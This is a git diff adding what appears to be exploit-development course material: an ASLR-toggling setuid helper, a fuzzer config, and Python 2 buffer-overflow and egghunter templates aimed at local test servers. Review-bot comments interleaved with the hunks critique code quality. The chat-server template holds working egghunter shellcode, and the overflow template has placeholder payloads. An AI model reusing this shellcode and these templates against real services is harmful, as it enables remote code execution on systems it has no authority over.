diff --git a/exploit_development/aslr_changer b/exploit_development/aslr_changer
new file mode 100644
index 0000000..2952ec3
Binary files /dev/null and b/exploit_development/aslr_changer differ
diff --git a/exploit_development/aslr_changer.c b/exploit_development/aslr_changer.c
new file mode 100644
index 0000000..2bdcc86
--- /dev/null
+++ b/exploit_development/aslr_changer.c
@@ -0,0 +1,29 @@
+#include
+#include
+#include
+
+int main(int argc, char *argv[]) {
+ FILE *fp;
+ char buff[100];
+
+ if(seteuid(0) == -1) {
+ fprintf(stderr, "Failed to set UID to root - is this binary setuid root?\n");
+ return -1;
+ }
+
+ if(argc != 2 || (strcmp(argv[1], "0") != 0 && strcmp(argv[1], "2") != 0)) {
+ fprintf(stderr, "Usage: %s [0 or 2]\nSets randomize_va_space to 0 (ASLR off) or 2 (ASLR on)\n", argv[0]);
+ return -1;
+ }
+
+ fp = fopen("/proc/sys/kernel/randomize_va_space", "w");
+ fprintf(fp, "%s\n", argv[1]);
+ fclose(fp);
+
+ fp = fopen("/proc/sys/kernel/randomize_va_space", "r");
+ fgets(buff, 99, fp);
+ fclose(fp);
+
+ printf("randomize_va_space is now %s", buff);
+ return 0;
+}
diff --git a/exploit_development/chatserver-smallbuffer b/exploit_development/chatserver-smallbuffer
new file mode 100644
index 0000000..893c561
Binary files /dev/null and b/exploit_development/chatserver-smallbuffer differ
diff --git a/exploit_development/gdbinit.txt b/exploit_development/gdbinit.txt
new file mode 100644
index 0000000..fa8381c
--- /dev/null
+++ b/exploit_development/gdbinit.txt
@@ -0,0 +1,4 @@
+source /root/s5/archive/peda-master/peda.py
+set disassembly-flavor intel
+set follow-fork-mode parent
+#source /root/.gdbinit-gef.py
diff --git a/exploit_development/httpdpost.fuzzer b/exploit_development/httpdpost.fuzzer
new file mode 100644
index 0000000..c58c23c
--- /dev/null
+++ b/exploit_development/httpdpost.fuzzer
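Review bot: Neither `fopen("/proc/sys/kernel/randomize_va_space", ...)` result is checked, so when the sysctl cannot be opened (the binary is not actually installed setuid root, or /proc/sys is read-only as it is in many containers) the following `fprintf(fp, ...)` and `fgets(buff, 99, fp)` dereference NULL and the tool crashes instead of reporting the cause. After each fopen add `if (fp == NULL) { perror("/proc/sys/kernel/randomize_va_space"); return -1; }`, and guard the read with `if (fgets(buff, sizeof buff, fp) == NULL)` so an empty read does not print an uninitialised buffer. The `seteuid(0)` call can only succeed when the process already has uid 0 available (setuid-root binary or root caller), so it is effectively a privilege self-check rather than an escalation; since the helper is meant to run setuid root, the strict `argv[1]` whitelist of "0"/"2" is the property that keeps it from writing arbitrary values and deserves a comment saying so. The same commit also adds the compiled `aslr_changer` binary next to the source; a helper intended to be installed setuid root should be built from the reviewed source rather than committed prebuilt.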
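Review bot: `source /root/s5/archive/peda-master/peda.py` hardcodes one machine's root home directory, so the init file silently fails to load PEDA for any other user or checkout. A path documented in a README install step (or a variable the user sets once) would make the file reusable; the commented-out `#source /root/.gdbinit-gef.py` line has the same problem and could carry a short comment explaining it is an alternative to PEDA.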
@@ -0,0 +1,13 @@
+outbound fuzz 'POST /arbitrarydataarbitrarydataarbitrarydataarbitrarydata\r\n\r\n\n'
+# String to match in the response
+inbound '404'
+# What port the fuzzer tries to connect to
+port 8080
+# What protocol to use
+proto tcp
+# How long to wait on a response
+receiveTimeout 1
+# How long to wait between retrying test cases
+failureTimeout 5
+# Number of times to retry a test case
+failureThreshold 3
\ No newline at end of file
diff --git a/exploit_development/libhttpd b/exploit_development/libhttpd
new file mode 100644
index 0000000..a3abc37
Binary files /dev/null and b/exploit_development/libhttpd differ
diff --git a/exploit_development/sockets_example.py b/exploit_development/sockets_example.py
new file mode 100644
index 0000000..bba1a29
--- /dev/null
+++ b/exploit_development/sockets_example.py
@@ -0,0 +1,26 @@
+import socket
+import sys
+import threading
+import struct
+
+IP = "127.0.0.1"
+PORT=8080
+
+jmpesp = ????
+offset = ????
+
+buf = ????
+
+payload = ????
+payload = "POST %s\r\n\r\n" % payload
+
+sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sock.settimeout(2)
+sock.connect((IP,PORT))
+sock.send(payload)
+print "Buffer sent! (len %d)" % len(payload)
+try:
+ print sock.recv(4096)
+ print "No crash...."
+except:
+ print "Server died, Yayyyy!!"
\ No newline at end of file
diff --git a/exploit_development/triple_socket_template.py b/exploit_development/triple_socket_template.py
new file mode 100644
index 0000000..2d574bc
--- /dev/null
+++ b/exploit_development/triple_socket_template.py
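Review bot: The bare `except:` at the end of sockets_example.py treats every exception as a crash, including the `socket.timeout` that `settimeout(2)` raises when the server is merely slow and `KeyboardInterrupt`, so the "Server died" message is not a reliable verdict. Narrow it to `except socket.timeout: print "No response within timeout"` followed by `except socket.error as e: print "Connection error: %s" % e`. `sock.send(payload)` may also write only part of the buffer, so `sock.sendall(payload)` is the call that matches the "Buffer sent! (len %d)" message, and the socket is never closed. `sys`, `threading` and `struct` are imported but unused, and the `????` placeholders mean the file does not parse as committed; if it is intended as a fill-in template, a header comment saying so (and noting the Python 2 print syntax) would help the next reader.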
@@ -0,0 +1,43 @@
+#!/usr/bin/python
+import os
+import socket
+import sys
+import threading
+import struct
+import time
+
+HOST="127.0.0.1"
+PORT=2501
+
+# Matt Miller Access() egghunter, triggers on "W00TW00T"
+egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
+egghunterPayload = ?
+msgPayload = ?
+
+# Connect one user
+sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock1.connect((HOST, PORT))
+sock1.send("usr1\r\n")
+sock1.recv(1024)
+print "Connected first user"
+
+# Connect a second user and message the first with the egg
+sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock2.connect((HOST, PORT))
+sock2.send("usr2\r\n")
+sock2.recv(1024)
+time.sleep(1)
+print "Connected second user"
+sock2.send(msgPayload)
+print "Sent msg payload"
+
+# Connect a final user to trigger egghunter in username
+sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock3.connect((HOST, PORT))
+sock3.send(egghunterPayload)
+print "Sent egghunter payload"
+
+# Close down
+sock3.close()
+sock2.close()
+sock1.close()
\ No newline at end of file
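Review bot: The three sockets are closed only on the straight-line path under `# Close down`, so if any `connect()` or `send()` raises (server not listening, wrong port) the connections opened so far are leaked until interpreter exit; wrapping the body in `try: ... finally:` that closes whichever of sock1/sock2/sock3 were created keeps the cleanup unconditional. `send()` is used throughout where `sendall()` is the call that guarantees the whole buffer is written, and the two `recv(1024)` results are discarded. `os`, `sys`, `threading` and `struct` are unused imports, and `egghunterPayload = ?` / `msgPayload = ?` are not valid Python, so the file should state in a header comment that it is a fill-in template for Python 2 (the `#!/usr/bin/python` shebang and print statements fix the version).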